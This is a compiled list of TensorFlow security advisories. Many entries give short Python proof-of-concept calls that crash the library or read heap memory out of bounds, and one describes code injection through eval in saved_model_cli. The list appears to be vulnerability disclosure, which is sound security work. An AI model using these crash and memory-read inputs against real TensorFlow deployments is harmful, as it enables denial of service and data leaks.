The implementation of AddManySparseToTensorsMap is vulnerable to an integer overflow which results in a CHECK-fail when building new TensorShape objects (so, an assert failure based denial of service): import tensorflow as tf import numpy as np tf.raw_ops.AddManySparseToTensorsMap( sparse_indices=[(0,0),(0,1),(0,2),(4,3),(5,0),(5,1)], sparse_values=[1,1,1,1,1,1], sparse_shape=[232,232], container='', shared_name='', name=None) We are missing some validation on the shapes of the input tensors as well as directly constructing a large TensorShape with user-provided dimensions. The latter is an …

Integer overflows in Tensorflow

The implementations of SparseCwise ops are vulnerable to integer overflows. These can be used to trigger large allocations (so, OOM based denial of service) or CHECK-fails when building new TensorShape objects (so, assert failures based denial of service): import tensorflow as tf import numpy as np tf.raw_ops.SparseDenseCwiseDiv( sp_indices=np.array([[9]]), sp_values=np.array([5]), sp_shape=np.array([92233720368., 92233720368]), dense=np.array([4])) We are missing some validation on the shapes of the input tensors as well as directly constructing a …

Integer Overflow or Wraparound in TensorFlow

Impact The Grappler component of TensorFlow is vulnerable to a denial of service via CHECK-failure in constant folding for ; // … } The output_prop tensor has a shape that is controlled by user input and this can result in triggering one of the CHECKs in the PartialTensorShape constructor. This is an instance of TFSA-2021-198 . ### Patches We have patched the issue in GitHub commit be7b286d40bc68cb0b56f702186cc4837d508058 fix will be …

Integer overflow leading to crash in Tensorflow

The implementation of SparseCountSparseOutput can be made to crash a TensorFlow process by an integer overflow whose result is then used in a memory allocation: import tensorflow as tf import numpy as np tf.raw_ops.SparseCountSparseOutput( indices=[[1,1]], values=[2], dense_shape=[2 ** 31, 2 ** 32], weights=[1], binary_output=True, minlength=-1, maxlength=-1, name=None)

Integer overflow in TFLite array creation

An attacker can craft a TFLite model that would cause an integer overflow in TfLiteIntArrayCreate: TfLiteIntArray* TfLiteIntArrayCreate(int size) { int alloc_size = TfLiteIntArrayGetSizeInBytes(size); // … TfLiteIntArray* ret = (TfLiteIntArray*)malloc(alloc_size); // … } The TfLiteIntArrayGetSizeInBytes returns an int instead of a size_t: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; int computed_size = sizeof(dummy) + sizeof(dummy.data[0]) * size;

Integer overflow in TFLite

An attacker can craft a TFLite model that would cause an integer overflow in embedding lookup operations: int embedding_size = 1; int lookup_size = 1; for (int i = 0; i < lookup_rank - 1; i++, k++) { const int dim = dense_shape->data.i32[i]; lookup_size *= dim; output_shape->data[k] = dim; } for (int i = 1; i < embedding_rank; i++, k++) { const int dim = SizeOfDimension(value, i); embedding_size *= dim; …

Integer overflow in TensorFlow

Under certain scenarios, Grappler component of TensorFlow is vulnerable to an integer overflow during cost estimation for crop and resize. Since the cropping parameters are user controlled, a malicious person can trigger undefined behavior.

Integer overflow in Tensorflow

The implementation of shape inference for Dequantize is vulnerable to an integer overflow weakness: import tensorflow as tf input = tf.constant([1,1],dtype=tf.qint32) @tf.function def test(): y = tf.raw_ops.Dequantize( input=input, min_range=[1.0], max_range=[10.0], mode='MIN_COMBINED', narrow_range=False, axis=2**31-1, dtype=tf.bfloat16) return y test() The axis argument can be -1 (the default value for the optional argument) or any other positive value at most the number of dimensions of the input. Unfortunately, the upper bound is not …

Insecure temporary file in Tensorflow

In multiple places, TensorFlow uses tempfile.mktemp to create temporary files. While this is acceptable in testing, in utilities and libraries it is dangerous as a different process can create the file between the check for the filename in mktemp and the actual creation of the file by a subsequent operation (a TOC/TOU type of weakness). In several instances, TensorFlow was supposed to actually create a temporary directory instead of a …

Heap overflow in Tensorflow

The implementation of SparseCountSparseOutput is vulnerable to a heap overflow: import tensorflow as tf import numpy as np tf.raw_ops.SparseCountSparseOutput( indices=[[-1,-1]], values=[2], dense_shape=[1, 1], weights=[1], binary_output=True, minlength=-1, maxlength=-1, name=None)

Division by zero in TFLite

An attacker can craft a TFLite model that would trigger a division by zero in the implementation of depthwise convolutions. The parameters of the convolution can be user controlled and are also used within a division operation to determine the size of the padding that needs to be added before applying the convolution. There is no check before this division that the divisor is stricly positive.

Division by zero in TFLite

An attacker can craft a TFLite model that would trigger a division by zero in BiasAndClamp implementation: inline void BiasAndClamp(float clamp_min, float clamp_max, int bias_size, const float* bias_data, int array_size, float* array_data) { // … TFLITE_DCHECK_EQ((array_size % bias_size), 0); // … } There is no check that the bias_size is non zero.

Crash when type cannot be specialized in Tensorflow

Under certain scenarios, TensorFlow can fail to specialize a type during shape inference: void InferenceContext::PreInputInit( const OpDef& op_def, const std::vector<const Tensor*>& input_tensors, const std::vector<ShapeHandle>& input_tensors_as_shapes) { const auto ret = full_type::SpecializeType(attrs_, op_def); DCHECK(ret.status().ok()) << "while instantiating types: " << ret.status(); ret_types_ = ret.ValueOrDie(); // … } However, DCHECK is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the ValueOrDie …

Crash due to erroneous `StatusOr` in TensorFlow

A GraphDef from a TensorFlow SavedModel can be maliciously altered to cause a TensorFlow process to crash due to encountering a StatusOr value that is an error and forcibly extracting the value from it: if (op_reg_data->type_ctor != nullptr) { VLOG(3) << "AddNode: found type constructor for " << node_def.name(); const auto ctor_type = full_type::SpecializeType(AttrSlice(node_def), op_reg_data->op_def); const FullTypeDef ctor_typedef = ctor_type.ValueOrDie(); if (ctor_typedef.type_id() != TFT_UNSET) { *(node_def.mutable_experimental_type()) = ctor_typedef; } } …

Assertion failure based denial of service in Tensorflow

The implementation of *Bincount operations allows malicious users to cause denial of service by passing in arguments which would trigger a CHECK-fail: import tensorflow as tf tf.raw_ops.DenseBincount( input=[[0], [1], [2]], size=[1], weights=[3,2,1], binary_output=False) There are several conditions that the input arguments must satisfy. Some are not caught during shape inference and others are not caught during kernel implementation. This results in CHECK failures later when the output tensors get allocated.

2021

Use after free / memory leak in `CollectiveReduceV2`

The async implementation of CollectiveReduceV2 suffers from a memory leak and a use after free: import tensorflow as tf tf.raw_ops.CollectiveReduceV2( input=[], group_size=[-10, -10, -10], group_key=[-10, -10], instance_key=[-10], ordering_token=[], merge_op='Mul', final_op='Div') This occurs due to the asynchronous computation and the fact that objects that have been std::move()d from are still accessed: auto done_with_cleanup = col_params, done = std::move(done) { done(); col_params->Unref(); }; OP_REQUIRES_OK_ASYNC(c, FillCollectiveParams(col_params, REDUCTION_COLLECTIVE, /group_size/ c->input(1), /group_key/ c->input(2), /instance_key/ c->input(3)), …

Unitialized access in `EinsumHelper::ParseEquation`

During execution, EinsumHelper::ParseEquation() is supposed to set the flags in input_has_ellipsis vector and *output_has_ellipsis boolean to indicate whether there is ellipsis in the corresponding inputs and output. However, the code only changes these flags to true and never assigns false. for (int i = 0; i < num_inputs; ++i) { input_label_counts->at(i).resize(num_labels); for (const int label : input_labels->at(i)) { if (label != kEllipsisLabel) input_label_counts->at(i)[label] += 1; else input_has_ellipsis->at(i) = true; } …

Undefined behavior via `nullptr` reference binding in sparse matrix multiplication

The code for sparse matrix multiplication is vulnerable to undefined behavior via binding a reference to nullptr: import tensorflow as tf tf.raw_ops.SparseMatMul( a=[[1.0,1.0,1.0]], b=[[],[],[]], transpose_a=False, transpose_b=False, a_is_sparse=False, b_is_sparse=True) This occurs whenever the dimensions of a or b are 0 or less. In the case on one of these is 0, an empty output tensor should be allocated (to conserve the invariant that output tensors are always allocated when the operation …

Segfault due to negative splits in `SplitV`

The implementation of SplitV can trigger a segfault is an attacker supplies negative arguments: import tensorflow as tf tf.raw_ops.SplitV( value=tf.constant([]), size_splits=[-1, -2] ,axis=0, num_split=2) This occurs whenever size_splits contains more than one value and at least one value is negative.

Overflow/crash in `tf.tile` when tiling tensor is large

If tf.tile is called with a large input argument then the TensorFlow process will crash due to a CHECK-failure caused by an overflow. import tensorflow as tf import numpy as np tf.keras.backend.tile(x=np.ones((1,1,1)), n=[100000000,100000000, 100000000]) The number of elements in the output tensor is too much for the int64_t type and the overflow is detected via a CHECK statement. This aborts the process.

Overflow/crash in `tf.range`

While calculating the size of the output within the tf.range kernel, there is a conditional statement of type int64 = condition ? int64 : double. Due to C++ implicit conversion rules, both branches of the condition will be cast to double and the result would be truncated before the assignment. This result in overflows: import tensorflow as tf tf.sparse.eye(num_rows=9223372036854775807, num_columns=None) Similarly, tf.range would result in crashes due to overflows if …

Overflow/crash in `tf.image.resize` when size is large

If tf.image.resize is called with a large input argument then the TensorFlow process will crash due to a CHECK-failure caused by an overflow. import tensorflow as tf import numpy as np tf.keras.layers.UpSampling2D( size=1610637938, data_format='channels_first', interpolation='bilinear')(np.ones((5,1,1,1))) The number of elements in the output tensor is too much for the int64_t type and the overflow is detected via a CHECK statement. This aborts the process.

Null pointer exception when `Exit` node is not preceded by `Enter` op

The process of building the control flow graph for a TensorFlow model is vulnerable to a null pointer exception when nodes that should be paired are not: import tensorflow as tf @tf.function def func(): return tf.raw_ops.Exit(data=[False,False]) func() This occurs because the code assumes that the first node in the pairing (e.g., an Enter node) always exists when encountering the second node (e.g., an Exit node): … } else if (IsExit(curr_node)) …

Null pointer exception in `DeserializeSparse`

The shape inference code for DeserializeSparse can trigger a null pointer dereference: import tensorflow as tf dataset = tf.data.Dataset.range(3) @tf.function def test(): y = tf.raw_ops.DeserializeSparse( serialized_sparse=tf.data.experimental.to_variant(dataset), dtype=tf.int32) test() This is because the shape inference function assumes that the serialize_sparse tensor is a tensor with positive rank (and having 3 as the last dimension). However, in the example above, the argument is a scalar (i.e., rank 0).

Integer division by 0 in `tf.raw_ops.AllToAll`

The shape inference code for AllToAll can be made to execute a division by 0: import tensorflow as tf @tf.function def func(): return tf.raw_ops.AllToAll( input=[0.0, 0.1652, 0.6543], group_assignment=[1, -1], concat_dimension=0, split_dimension=0, split_count=0) func() This occurs whenever the split_count argument is 0: TF_RETURN_IF_ERROR(c->GetAttr("split_count", &split_count)); … for (int32_t i = 0; i < rank; ++i) { … dims[i] = c->MakeDim(c->Value(dims[i]) / split_count); … }

Incomplete validation of shapes in multiple TF ops

Several TensorFlow operations are missing validation for the shapes of the tensor arguments involved in the call. Depending on the API, this can result in undefined behavior and segfault or CHECK-fail related crashes but in some scenarios writes and reads from heap populated arrays are also possible. We have discovered these issues internally via tooling while working on improving/testing GPU op determinism. As such, we don't have reproducers and there …

Incomplete validation in boosted trees code

The code for boosted trees in TensorFlow is still missing validation. As a result, attackers can trigger denial of service (via dereferencing nullptrs or via CHECK-failures) as well as abuse undefined behavior (binding references to nullptrs). An attacker can also read and write from heap buffers, depending on the API that gets used and the arguments that are passed to the call. Note: Given that the boosted trees implementation in …

Heap OOB read in `tf.raw_ops.SparseCountSparseOutput`

The shape inference functions for SparseCountSparseOutput can trigger a read outside of bounds of heap allocated array: import tensorflow as tf @tf.function def func(): return tf.raw_ops.SparseCountSparseOutput( indices=[1], values=[[1]], dense_shape=[10], weights=[], binary_output= True) func() The function fails to check that the first input (i.e., indices) has rank 2: auto rank = c->Dim(c->input(0), 1);

Heap OOB in shape inference for `QuantizeV2`

The shape inference code for QuantizeV2 can trigger a read outside of bounds of heap allocated array. The code allows axis to be an optional argument (s would contain an error::NOT_FOUND error code). Otherwise, it assumes that axis is a valid index into the dimensions of the input tensor. If axis is less than -1 then this results in a heap OOB read.

Heap OOB in `SparseBinCount`

The implementation of SparseBinCount is vulnerable to a heap OOB: import tensorflow as tf tf.raw_ops.SparseBincount( indices=[[0],[1],[2]] values=[0,-10000000] dense_shape=[1,1] size=[1] weights=[3,2,1] binary_output=False) This is because of missing validation between the elements of the values argument and the shape of the sparse output: for (int64_t i = 0; i < indices_mat.dimension(0); ++i) { const int64_t batch = indices_mat(i, 0); const Tidx bin = values(i); … out(batch, bin) = …; }

Heap OOB in `FusedBatchNorm` kernels

The implementation of FusedBatchNorm kernels is vulnerable to a heap OOB: import tensorflow as tf tf.raw_ops.FusedBatchNormGrad( y_backprop=tf.constant([i for i in range(9)],shape=(1,1,3,3),dtype=tf.float32) x=tf.constant([i for i in range(2)],shape=(1,1,1,2),dtype=tf.float32) scale=[1,1], reserve_space_1=[1,1], reserve_space_2=[1,1,1], epsilon=1.0, data_format='NCHW', is_training=True)

Heap buffer overflow in `Transpose`

The shape inference function for Transpose is vulnerable to a heap buffer overflow: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.Transpose(x=[1,2,3,4],perm=[-10]) return y test() This occurs whenever perm contains negative elements. The shape inference function does not validate that the indices in perm are all valid: for (int32_t i = 0; i < rank; ++i) { int64_t in_idx = data[i]; if (in_idx >= rank) { return errors::InvalidArgument("perm dim …

FPE in `ParallelConcat`

The implementation of ParallelConcat misses some input validation and can produce a division by 0: import tensorflow as tf @tf.function def test(): y = tf.raw_ops.ParallelConcat(values=[['tf']],shape=0) return y test()

Deadlock in mutually recursive `tf.function` objects

The code behind tf.function API can be made to deadlock when two tf.function decorated Python functions are mutually recursive: import tensorflow as tf @tf.function() def fun1(num): if num == 1: return print(num) fun2(num-1) @tf.function() def fun2(num): if num == 0: return print(num) fun1(num-1) fun1(9) This occurs due to using a non-reentrant Lock Python object. Loading any model which contains mutually recursive functions is vulnerable. An attacker can cause denial of …

Crashes due to overflow and `CHECK`-fail in ops with large tensor shapes

TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an int64_t. If an overflow occurs, MultiplyWithoutOverflow would return a negative result. In the majority of TensorFlow codebase this then results in a CHECK-failure. Newer constructs exist which return a Status instead of crashing the binary.

Crash in `tf.math.segment_*` operations

The implementation of tf.math.segment_* operations results in a CHECK-fail related abort (and denial of service) if a segment id in segment_ids is large. import tensorflow as tf tf.math.segment_max(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_min(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_mean(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_sum(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_prod(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])

Crash in `max_pool3d` when size argument is 0 or negative

The Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative: import tensorflow as tf pool_size = [2, 2, 0] layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size) input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32) res = layer(input_tensor) This is due to the TensorFlow's implementation of pooling operations where the values in the sliding window are not checked to be strictly positive.

Code injection in `saved_model_cli`

TensorFlow's saved_model_cli tool is vulnerable to a code injection as it calls eval on user supplied strings def preprocess_input_exprs_arg_string(input_exprs_str): … for input_raw in filter(bool, input_exprs_str.split(';')): … input_key, expr = input_raw.split('=', 1) input_dict[input_key] = eval(expr) … This can be used by attackers to run arbitrary code on the plaform where the CLI tool runs. However, given that the tool is always run manually, the impact of this is not severe. We …

Arbitrary memory read in `ImmutableConst`

The ImmutableConst operation in TensorFlow can be tricked into reading arbitrary memory contents: import tensorflow as tf with open('/tmp/test','wb') as f: f.write(b'\xe2'*128) data = tf.raw_ops.ImmutableConst(dtype=tf.string,shape=3,memory_region_name='/tmp/test') print(data) This is because the tstring TensorFlow string class has a special case for memory mapped strings but the operation itself does not offer any support for this datatype.

Access to invalid memory during shape inference in `Cudnn*` ops

The shape inference code for the Cudnn* operations in TensorFlow can be tricked into accessing invalid memory, via a heap buffer overflow: import tensorflow as tf @tf.function def func(): return tf.raw_ops.CudnnRNNV3( input=[0.1, 0.1], input_h=[0.5], input_c=[0.1, 0.1, 0.1], params=[0.5, 0.5], sequence_lengths=[-1, 0, 1]) func() This occurs because the ranks of the input, input_h and input_c parameters are not validated, but code assumes they have certain values: auto input_shape = c->input(0); auto …

A use of uninitialized value vulnerability in Tensorflow

TensorFlow's Grappler optimizer has a use of unitialized variable: const NodeDef* dequeue_node; for (const auto& train_node : train_nodes) { if (IsDequeueOp(*train_node)) { dequeue_node = train_node; break; } } if (dequeue_node) { … } If the train_nodes vector (obtained from the saved model that gets optimized) does not contain a Dequeue node, then dequeue_node is left unitialized.

`SparseFillEmptyRows` heap OOB

The implementation of SparseFillEmptyRows can be made to trigger a heap OOB access: import tensorflow as tf data=tf.raw_ops.SparseFillEmptyRows( indices=[[0,0],[0,0],[0,0]], values=['sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'], dense_shape=[5,3], default_value='o') This occurs whenever the size of indices does not match the size of values.

Use of unitialized value in TFLite

All TFLite operations that use quantization can be made to use unitialized values. For example: const auto* affine_quantization = reinterpret_cast<TfLiteAffineQuantization*>( filter->quantization.params); The issue stems from the fact that quantization.params is only valid if quantization.type is different that kTfLiteNoQuantization. However, these checks are missing in large parts of the code.

Use after free in boosted trees creation

The implementation for tf.raw_ops.BoostedTreesCreateEnsemble can result in a use after free error if an attacker supplies specially crafted arguments: import tensorflow as tf v= tf.Variable([0.0]) tf.raw_ops.BoostedTreesCreateEnsemble( tree_ensemble_handle=v.handle, stamp_token=[0], tree_ensemble_serialized=['0'])

Use after free and segfault in shape inference functions

When running shape functions, some functions (such as MutableHashTableShape) produce extra output information in the form of a ShapeAndType struct. The shapes embedded in this struct are owned by an inference context that is cleaned up almost immediately; if the upstream code attempts to access this shape information, it can trigger a segfault. ShapeRefiner is mitigating this for normal output shapes by cloning them (and thus putting the newly created …

Segfault on strings tensors with mistmatched dimensions, due to Go code

Under certain conditions, Go code can trigger a segfault in string deallocation. For string tensors, C.TF_TString_Dealloc is called during garbage collection within a finalizer function. However, tensor structure isn't checked until encoding to avoid a performance penalty. The current method for dealloc assumes that encoding succeeded, but segfaults when a string tensor is garbage collected whose encoding failed (e.g., due to mismatched dimensions). To fix this, the call to set …

Reference binding to nullptr in unicode encoding

An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.UnicodeEncode: import tensorflow as tf from tensorflow.python.ops import gen_string_ops gen_string_ops.unicode_encode( input_values=[], input_splits=[], output_encoding='UTF-8', errors='ignore', replacement_char='a')

Reference binding to nullptr in shape inference

An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.SparseFillEmptyRows( indices = tf.constant([], shape=[0, 0], dtype=tf.int64), values = tf.constant([], shape=[0], dtype=tf.int64), dense_shape = tf.constant([], shape=[0], dtype=tf.int64), default_value = 0)

Reference binding to nullptr in map operations

An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.Map* and tf.raw_ops.OrderedMap* operations: import tensorflow as tf tf.raw_ops.MapPeek( key=tf.constant([8],dtype=tf.int64), indices=[], dtypes=[tf.int32], capacity=8, memory_limit=128)

Reference binding to nullptr in boosted trees

An attacker can generate undefined behavior via a reference binding to nullptr in BoostedTreesCalculateBestGainsPerFeature: import tensorflow as tf tf.raw_ops.BoostedTreesCalculateBestGainsPerFeature( node_id_range=[], stats_summary_list=[[1,2,3]], l1=[1.0], l2=[1.0], tree_complexity =[1.0], min_node_weight =[1.17], max_splits=5) A similar attack can occur in BoostedTreesCalculateBestFeatureSplitV2: import tensorflow as tf tf.raw_ops.BoostedTreesCalculateBestFeatureSplitV2( node_id_range=[], stats_summaries_list=[[1,2,3]], split_types=[''], candidate_feature_ids=[1,2,3,4], l1=[1], l2=[1], tree_complexity=[1.0], min_node_weight=[1.17], logits_dimension=5)

Null pointer dereference in TFLite

An attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service: import tensorflow as tf model = tf.keras.models.Sequential() model.add(tf.keras.Input(shape=(1, 2, 3))) model.add(tf.keras.layers.Dense(0, activation='relu')) converter = tf.lite.TFLiteConverter.from_keras_model(model) tflite_model = converter.convert() interpreter = tf.lite.Interpreter(model_content=tflite_model) interpreter.allocate_tensors() interpreter.invoke()

Null pointer dereference in `UncompressElement`

The code for tf.raw_ops.UncompressElement can be made to trigger a null pointer dereference: import tensorflow as tf data = tf.data.Dataset.from_tensors([0.0]) tf.raw_ops.UncompressElement( compressed=tf.data.experimental.to_variant(data), output_types=[tf.int64], output_shapes=[2])

Null pointer dereference in `RaggedTensorToTensor`

Sending invalid argument for row_partition_types of tf.raw_ops.RaggedTensorToTensor API results in a null pointer dereference and undefined behavior: import tensorflow as tf tf.raw_ops.RaggedTensorToTensor( shape=1, values=10, default_value=21, row_partition_tensors=tf.constant([0,0,0,0]), row_partition_types=[])

Null pointer dereference in `MatrixDiagPartOp`

If a user does not provide a valid padding value to tf.raw_ops.MatrixDiagPartOp, then the code triggers a null pointer dereference (if input is empty) or produces invalid behavior, ignoring all values after the first: import tensorflow as tf tf.raw_ops.MatrixDiagPartV2( input=tf.ones(2,dtype=tf.int32), k=tf.ones(2,dtype=tf.int32), padding_value=[]) Although this example is given for MatrixDiagPartV2, all versions of the operation are affected.

Null pointer dereference and heap OOB read in operations restoring tensors

When restoring tensors via raw APIs, if the tensor name is not provided, TensorFlow can be tricked into dereferencing a null pointer: import tensorflow as tf tf.raw_ops.Restore( file_pattern=['/tmp'], tensor_name=[], default_value=21, dt=tf.int, preferred_shard=1) The same undefined behavior can be triggered by tf.raw_ops.RestoreSlice: import tensorflow as tf tf.raw_ops.RestoreSlice( file_pattern=['/tmp'], tensor_name=[], shape_and_slice='2', dt=inp.array([tf.int]), preferred_shard=1) Alternatively, attackers can read memory outside the bounds of heap allocated data by providing some tensor names but not …

NPE in TFLite

The implementation of SVDF in TFLite is vulnerable to a null pointer error: TfLiteTensor* state = GetVariableInput(context, node, kStateTensor); // … GetTensorData<float>(state) The GetVariableInput function can return a null pointer but GetTensorData assumes that the argument is always a valid tensor. TfLiteTensor* GetVariableInput(TfLiteContext* context, const TfLiteNode* node, int index) { TfLiteTensor* tensor = GetMutableInput(context, node, index); return tensor->is_variable ? tensor : nullptr; } Furthermore, because GetVariableInput calls GetMutableInput which might …

Missing validation in shape inference for `Dequantize`

The shape inference code for tf.raw_ops.Dequantize has a vulnerability that could trigger a denial of service via a segfault if an attacker provides invalid arguments: import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.Dequantize( input_tensor = tf.constant(-10.0, dtype=tf.float32), input_tensor = tf.cast(input_tensor, dtype=tf.quint8), min_range = tf.constant([], shape=[0], dtype=tf.float32), max_range = tf.constant([], shape=[0], dtype=tf.float32), mode = 'MIN_COMBINED', narrow_range=False, axis=-10, dtype=tf.dtypes.float32)

Integer overflow due to conversion to unsigned

The implementation of tf.raw_ops.QuantizeAndDequantizeV4Grad is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=[1.0,2.0], input=[1.0,1.0], input_min=[0.0], input_max=[10.0], axis=-100)

Infinite loop in TFLite

The strided slice implementation in TFLite has a logic bug which can allow an attacker to trigger an infinite loop. This arises from newly introduced support for ellipsis in axis definition: for (int i = 0; i < effective_dims;) { if ((1 << i) & op_context->params->ellipsis_mask) { // … int ellipsis_end_idx = std::min(i + 1 + num_add_axis + op_context->input_dims - begin_count, effective_dims); // … for (; i < ellipsis_end_idx; ++i) …

Incomplete validation in MKL requantization

Due to incomplete validation in MKL implementation of requantization, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays: import tensorflow as tf tf.raw_ops.RequantizationRangePerChannel( input=[], input_min=[0,0,0,0,0], input_max=[1,1,1,1,1], clip_value_max=1)

Incomplete validation in `QuantizeV2`

Due to incomplete validation in tf.raw_ops.QuantizeV2, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays: import tensorflow as tf tf.raw_ops.QuantizeV2( input=[1,2,3], min_range=[1,2], max_range=[], T=tf.qint32, mode='SCALED', round_mode='HALF_AWAY_FROM_ZERO', narrow_range=False, axis=1, ensure_minimum_range=3)

Incomplete validation in `MaxPoolGrad`

An attacker can trigger a denial of service via a segmentation fault in tf.raw_ops.MaxPoolGrad caused by missing validation: import tensorflow as tf tf.raw_ops.MaxPoolGrad( orig_input = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), orig_output = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), grad = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), ksize = [1, 16, 16, 1], strides = [1, 16, 18, 1], padding = "EXPLICIT", explicit_paddings = [0, 0, 14, 3, 15, 5, …

Heap OOB in TFLite's `Gather*` implementations

TFLite's GatherNd implementation does not support negative indices but there are no checks for this situation. Hence, an attacker can read arbitrary data from the heap by carefully crafting a model with negative values in indices. Similar issue exists in Gather implementation. import tensorflow as tf import numpy as np tf.compat.v1.disable_v2_behavior() params = tf.compat.v1.placeholder(name="params", dtype=tf.int64, shape=(1,)) indices = tf.compat.v1.placeholder(name="indices", dtype=tf.int64, shape=()) out = tf.gather(params, indices, name='out') with tf.compat.v1.Session() as sess: …

Heap OOB in TFLite

TFLite's expand_dims.cc contains a vulnerability which allows reading one element outside of bounds of heap allocated data: if (axis < 0) { axis = input_dims.size + 1 + axis; } TF_LITE_ENSURE(context, axis <= input_dims.size); TfLiteIntArray* output_dims = TfLiteIntArrayCreate(input_dims.size + 1); for (int i = 0; i < output_dims->size; ++i) { if (i < axis) { output_dims->data[i] = input_dims.data[i]; } else if (i == axis) { output_dims->data[i] = 1; } else …

Heap OOB in nested `tf.map_fn` with `RaggedTensor`s

It is possible to nest a tf.map_fn within another tf.map_fn call. However, if the input tensor is a RaggedTensor and there is no function signature provided, code assumes the output is a fully specified tensor and fills output buffer with uninitialized contents from the heap: import tensorflow as tf x = tf.ragged.constant([[1,2,3], [4,5], [6]]) t = tf.map_fn(lambda r: tf.map_fn(lambda y: r, r), x) z = tf.ragged.constant([[[1,2,3],[1,2,3],[1,2,3]],[[4,5],[4,5]],[[6]]]) The t and z …

Heap OOB in boosted trees

An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to BoostedTreesSparseCalculateBestFeatureSplit: import tensorflow as tf tf.raw_ops.BoostedTreesSparseCalculateBestFeatureSplit( node_id_range=[0,10], stats_summary_indices=[[1, 2, 3, 0x1000000]], stats_summary_values=[1.0], stats_summary_shape=[1,1,1,1], l1=l2=[1.0], tree_complexity=[0.5], min_node_weight=[1.0], logits_dimension=3, split_type='inequality')

Heap OOB in `UpperBound` and `LowerBound`

An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to tf.raw_ops.UpperBound: import tensorflow as tf tf.raw_ops.UpperBound( sorted_input=[1,2,3], values=tf.constant(value=[[0,0,0],[1,1,1],[2,2,2]],dtype=tf.int64), out_type=tf.int64)

Heap OOB in `ResourceScatterUpdate`

An attacker can trigger a read from outside of bounds of heap allocated data by sending invalid arguments to tf.raw_ops.ResourceScatterUpdate: import tensorflow as tf v = tf.Variable([b'vvv']) tf.raw_ops.ResourceScatterUpdate( resource=v.handle, indices=[0], updates=['1', '2', '3', '4', '5'])

Heap OOB in `RaggedGather`

If the arguments to tf.raw_ops.RaggedGather don't determine a valid ragged tensor code can trigger a read from outside of bounds of heap allocated buffers. import tensorflow as tf tf.raw_ops.RaggedGather( params_nested_splits = [0,0,0], params_dense_values = [1,1], indices = [0,0,9,0,0], OUTPUT_RAGGED_RANK=0) In debug mode, the same code triggers a CHECK failure.

Heap OOB and CHECK fail in `ResourceGather`

An attacker can trigger a crash via a CHECK-fail in debug builds of TensorFlow using tf.raw_ops.ResourceGather or a read from outside the bounds of heap allocated data in the same API in a release build: import tensorflow as tf tensor = tf.constant(value=[[1,2],[3,4],[5,6]],shape=(3,2),dtype=tf.uint32) v = tf.Variable(tensor) tf.raw_ops.ResourceGather( resource=v.handle, indices=[0], dtype=tf.uint32, batch_dims=10, validate_indices=False)

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation for tf.raw_ops.FractionalAvgPoolGrad can be tricked into accessing data outside of bounds of heap allocated buffers: import tensorflow as tf tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=[0,1,2,3], out_backprop = np.array([[[[541],[541]],[[541],[541]]]]), row_pooling_sequence=[0, 0, 0, 0, 0], col_pooling_sequence=[-2, 0, 0, 2, 0], overlapping=True)

FPE in LSH in TFLite

An attacker can craft a TFLite model that would trigger a division by zero error in LSH implementation. int RunningSignBit(const TfLiteTensor* input, const TfLiteTensor* weight, float seed) { int input_item_bytes = input->bytes / SizeOfDimension(input, 0); // … } There is no check that the first dimension of the input is non zero.

Division by zero in TFLite

The implementation of fully connected layers in TFLite is vulnerable to a division by zero error: const int batch_size = input_size / filter->dims->data[1]; An attacker can craft a model such that filter->dims->data[1] is 0.

Division by 0 in most convolution operators

Most implementations of convolution operators in TensorFlow are affected by a division by 0 vulnerability where an attacker can trigger a denial of service via a crash: import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.Conv2D( input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32), filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32), strides = [1, 1, 1, 1], padding = "SAME")

Division by 0 in `ResourceGather`

An attacker can trigger a crash via a floating point exception in tf.raw_ops.ResourceGather: import tensorflow as tf tensor = tf.constant(value=[[]],shape=(0,1),dtype=tf.uint32) v = tf.Variable(tensor) tf.raw_ops.ResourceGather( resource=v.handle, indices=[0], dtype=tf.uint32, batch_dims=1, validate_indices=False)

Crash caused by integer conversion to unsigned

An attacker can cause a denial of service in boosted_trees_create_quantile_stream_resource by using negative arguments: import tensorflow as tf from tensorflow.python.ops import gen_boosted_trees_ops import numpy as np v= tf.Variable([0.0, 0.0, 0.0, 0.0, 0.0]) gen_boosted_trees_ops.boosted_trees_create_quantile_stream_resource( quantile_stream_resource_handle = v.handle, epsilon = [74.82224], num_streams = [-49], max_elements = np.int32(586))

Bad alloc in `StringNGrams` caused by integer conversion

